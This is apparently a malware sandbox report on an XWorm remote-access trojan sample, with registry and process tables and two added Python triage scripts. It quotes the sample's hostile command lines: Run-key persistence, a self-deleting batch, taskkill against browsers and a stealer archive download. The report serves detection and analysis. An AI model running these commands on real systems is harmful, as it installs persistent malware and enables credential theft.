| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239} | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:PID = "0" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\PastIconsStream = 1400000005000000010001000100000014000000494c200601000400280010001000ffffffff2110ffffffffffffffff424d36... (binary tray icon cache; the remainder of this row is truncated in the source) |
f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000424d3e000000000000003e0000002800000010000000400000000100010000000000000100000000000000000000000000000000000000000000ffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff000000000000000000000000000000000000000000000000010000000800000001000000040000001c0000000100000000000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\30\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\SniffedFolderType = "Downloads" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\30\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133524141059344388" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000000000001000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Mode = "1" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:FMTID = "{30C8EEF4-A832-41E2-AB32-E3C3CA28FD29}" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort = 0000000000000000000000000000000002000000f4eec83032a8e241ab32e3c3ca28fd29030000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\IconSize = "96" | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main (2).zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe\:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\XWorm-3.1-main.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\XWorm-RAT-main.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe\:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\xworm5.5-main.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe\:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\steal_31.03.24_v2.20.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe\:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe\:Zone.Identifier:$DATA | C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main (1).zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Xworm-RAT-V3.1-main.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
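The rows above show two things worth separating during triage: msedge.exe writing a Zone.Identifier stream (the Mark of the Web) onto every archive it downloads, and the unpacked XWorm RAT V2.1.exe and Command Reciever.exe creating the same stream on the binaries they drop under AppData, so those executables carry an Internet-zone mark outside the Downloads folder. The script below is an added example, not code from this report or from XWorm: it parses the stream's INI format, reads it from disk on NTFS, and flags marked executables that sit outside Downloads. The stream contents in SAMPLE_STREAMS are constructed because the report lists the streams but not their contents; the zip's HostUrl is taken from the msedge.exe command line in the Processes section, and ZoneId=3 is an assumption.

```python
import configparser
import sys

# Names Windows assigns to the ZoneId values written into Zone.Identifier streams.
ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}

# Constructed sample: paths come from the NTFS ADS table in this report, the
# stream bodies are assumed (ZoneId=3 is what a browser download normally gets).
SAMPLE_STREAMS = {
    r"C:\Users\Admin\Downloads\steal_31.03.24_v2.20.zip":
        "[ZoneTransfer]\r\nZoneId=3\r\n"
        "HostUrl=https://moonreborn.com/attachments/steal_31.03.24_v2.20.zip\r\n",
    r"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe":
        "[ZoneTransfer]\r\nZoneId=3\r\n",
    r"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe":
        "[ZoneTransfer]\r\nZoneId=3\r\n",
    r"C:\Users\Admin\Desktop\notes.txt": "",   # control: locally created, no stream
}

def parse_zone_identifier(text):
    """Parse the INI-style stream body. Returns {} when the stream is empty,
    malformed, or lacks a [ZoneTransfer] section; ZoneId is converted to int."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str                      # keep ZoneId / HostUrl / ReferrerUrl case
    try:
        cp.read_string(text.replace("\r\n", "\n"))
    except configparser.Error:                # e.g. MissingSectionHeaderError
        return {}
    if not cp.has_section("ZoneTransfer"):
        return {}
    info = dict(cp.items("ZoneTransfer"))
    if "ZoneId" in info:
        try:
            info["ZoneId"] = int(info["ZoneId"])
        except ValueError:
            pass
    return info

def read_zone_identifier(path):
    """Read the stream from disk. The ':Zone.Identifier' suffix is NTFS ADS
    syntax, so this only returns data on Windows; "" means no stream."""
    try:
        with open(path + ":Zone.Identifier", "r", encoding="utf-8", errors="replace") as fh:
            return fh.read()
    except OSError:
        return ""

def triage_streams(streams):
    """streams: {path: stream body}. One record per file: zone name, recorded
    origin URL, and a flag for an executable that carries an Internet-zone mark
    but lives outside Downloads (the situation of the two dropped binaries here)."""
    exe_suffixes = (".exe", ".dll", ".scr", ".bat", ".cmd", ".ps1", ".js", ".vbs")
    records = []
    for path, text in streams.items():
        info = parse_zone_identifier(text)
        zone = info.get("ZoneId")
        lowered = path.lower()
        records.append({
            "path": path,
            "zone": ZONE_NAMES.get(zone, "none" if zone is None else "unknown(%s)" % zone),
            "host_url": info.get("HostUrl", ""),
            "flag": zone == 3 and lowered.endswith(exe_suffixes) and "\\downloads\\" not in lowered,
        })
    return records

if __name__ == "__main__":
    # With file paths as arguments (on Windows) the streams are read from disk;
    # without arguments the constructed sample is used.
    streams = {p: read_zone_identifier(p) for p in sys.argv[1:]} or SAMPLE_STREAMS
    for rec in triage_streams(streams):
        print("%-5s %-14s %s  %s" % ("FLAG" if rec["flag"] else "", rec["zone"],
                                     rec["path"], rec["host_url"]))
```

On a live host the same check can be run with `dir /r` or `Get-Item -Stream Zone.Identifier`; the point of scripting it is the flag column, which separates a normal marked download from a marked binary that something other than the browser placed under AppData.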
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
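Several of the signatures listed above (Adds Run key to start application, Enumerates processes with tasklist, Delays execution with timeout.exe, Kills process with taskkill, Modifies registry key) map onto a handful of command lines in the Processes section that follows: a self-deleting .bat that polls the dropper's PID with tasklist, find and timeout until it exits, then launches Update.exe; a reg.exe write of a Run value named ChromeUpdater pointing into AppData\Roaming; taskkill against five browsers; and cvtres.exe from the .NET Framework directory started with an address and port on its command line. The script below is an added example, not part of the sandbox report or of XWorm: it runs those four rules over the command lines, copied from the report into a constructed sample list, and returns the findings per rule. Rule names and the sample list are the example's own.

```python
import re

# Command lines copied from the Processes section of this report into a constructed
# sample list (most benign browser children omitted; one kept as a control).
SAMPLE_CMDLINES = [
    r'"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"',
    r'"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"',
    r'"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp3771.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp3771.tmp.bat',
    r'Tasklist /fi "PID eq 1908"',
    r'find ":"',
    r'Timeout /T 1 /Nobreak',
    r'"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"',
    r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdater /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe /f',
    r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 2EA4LO 127.0.0.1 8000 Q4JNC5',
    r'"cmd.exe" /c taskkill /F /IM chrome.exe',
    r'taskkill /F /IM chrome.exe',
    r'taskkill /F /IM msedge.exe',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US',
]

# reg.exe writing a Run value; captures the /d payload path.
RUN_KEY = re.compile(r'\breg(?:\.exe)?"?\s+add\s+"?HK[^\s"]*\\CurrentVersion\\Run\b.*?/d\s+"?(?P<target>.+?)"?(?:\s+/f)?\s*$', re.I)
USER_WRITABLE = re.compile(r'\\Users\\[^\\]+\\(?:AppData|Downloads)\\', re.I)
# cmd.exe running a .bat and deleting that same file in one command line.
SELF_DELETING_BAT = re.compile(r'cmd(?:\.exe)?"?\s+/c\s+(?P<bat>\S+\.bat)\s*&\s*del\s+(?P=bat)', re.I)
# Loop body of the dropped batch: poll a PID, test the output, sleep one second.
PID_POLL = re.compile(r'^tasklist\s+/fi\s+"pid eq (?P<pid>\d+)"', re.I)
FIND_COLON = re.compile(r'^find\s+":"', re.I)
SLEEP = re.compile(r'^timeout\s+/t\s+\d+\s+/nobreak', re.I)
# taskkill against a browser image (frees the locked credential and cookie stores).
BROWSER_KILL = re.compile(r'\btaskkill(?:\.exe)?\b.*?/im\s+(?P<image>(?:chrome|msedge|firefox|brave|opera)\.exe)', re.I)
# A .NET Framework tool whose arguments contain an IPv4 address followed by a port.
DOTNET_BIN = re.compile(r'Microsoft\.NET\\Framework(?:64)?\\v[\d.]+\\(?P<bin>[^\\"]+\.exe)"?\s+(?P<args>.+)$', re.I)
IP_PORT = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\s+\d{1,5}\b')

def triage(cmdlines):
    """Return {rule: [findings]} for an ordered list of process command lines."""
    f = {"run_key_persistence": [], "self_deleting_batch": [], "parent_exit_wait_loop": [],
         "browser_kill": [], "dotnet_lolbin_with_socket_args": []}
    lines = [c.strip() for c in cmdlines]
    for i, line in enumerate(lines):
        m = RUN_KEY.search(line)
        if m:
            target = m.group("target").strip()
            if USER_WRITABLE.search(target):
                target += " [user-writable path]"
            f["run_key_persistence"].append(target)
        m = SELF_DELETING_BAT.search(line)
        if m:
            f["self_deleting_batch"].append(m.group("bat"))
        m = PID_POLL.search(line)
        # The loop shows up as three consecutive child processes of the batch.
        if m and i + 2 < len(lines) and FIND_COLON.search(lines[i + 1]) and SLEEP.search(lines[i + 2]):
            f["parent_exit_wait_loop"].append("waits for PID %s to exit" % m.group("pid"))
        m = BROWSER_KILL.search(line)
        if m and m.group("image").lower() not in f["browser_kill"]:
            f["browser_kill"].append(m.group("image").lower())
        m = DOTNET_BIN.search(line)
        if m and IP_PORT.search(m.group("args")):
            f["dotnet_lolbin_with_socket_args"].append("%s %s" % (m.group("bin"), m.group("args").strip()))
    return f

if __name__ == "__main__":
    for rule, hits in triage(SAMPLE_CMDLINES).items():
        print(rule)
        for hit in hits:
            print("   ", hit)
```

The wait-loop rule relies on the three commands being adjacent in the list, which holds for a sandbox process tree; on EDR telemetry group by parent process id instead of list position. The cvtres.exe rule does not prove code injection on its own, but the build tool never takes an address and port as arguments, and the report separately records SetThreadContext and WriteProcessMemory use, so the combination is what to pivot on.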
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://moonreborn.com/attachments/steal_31.03.24_v2.20.zip
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9a5f73cb8,0x7ff9a5f73cc8,0x7ff9a5f73cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
